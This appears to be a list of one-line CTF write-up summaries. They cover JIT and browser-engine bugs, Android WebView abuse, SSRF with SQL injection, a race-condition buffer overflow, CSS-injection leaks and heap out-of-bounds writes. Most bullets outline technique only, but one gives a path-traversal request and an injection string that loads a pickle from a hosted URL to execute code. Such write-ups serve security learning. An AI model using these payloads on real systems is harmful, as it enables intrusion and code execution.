tl;dr
- This challenge is a JIT VM
- The VM logic implements modular equations
tl;dr
- Exploit Android Webview Javascript Interface
- Communicate with a Service via AIDL
tl;dr
- SSRF using file_get_contents() and CRLF in ini_set()
- basic Header quirks to bypass waf
- sqli using column trick in SQLite to get the flag
tl;dr
- Double fetch race Condition in store_note function.
- overwrite size during race window to get buffer overflow.
- Do SROP for execve(“/bin/sh\x00”)
tl;dr
- CSS injection using url forging
- leaking password using :empty selectors
tl;dr
- Giving size > 48 causes heap OOB r/w of 16 bytes
- Use OOB r/w get leaks and overwrite objects for rip control
tl;dr
- Simple typer bug, range of BitAnd opcode is assumed to be [1, operand] when in reality it is [0, operand].
- Use range assumptions to create unchecked integer underflow.
- Bypass array bounds checks and obtain OOB write, overwrite size of array to get overlap.
- Use double & object array overlap to create addrOf & fakeObj primitives.
- Create overlapping fake array using StructureID leak to obtain arbitrary R/W.
tl;dr
-Get the docker-entrypoint.sh using /static../docker-entrypoint.sh
-Get the challenge files using /static../panda/cgi-bin/search_currency.py
-Host your exploit and use x‘|@pd.read_pickle(‘http://0.0.0.0:6334/output.exploit')|‘ to execute the exploit
tl;dr
- This challenge comes under easy level challenge.
- The binary has a script being executed using execvp.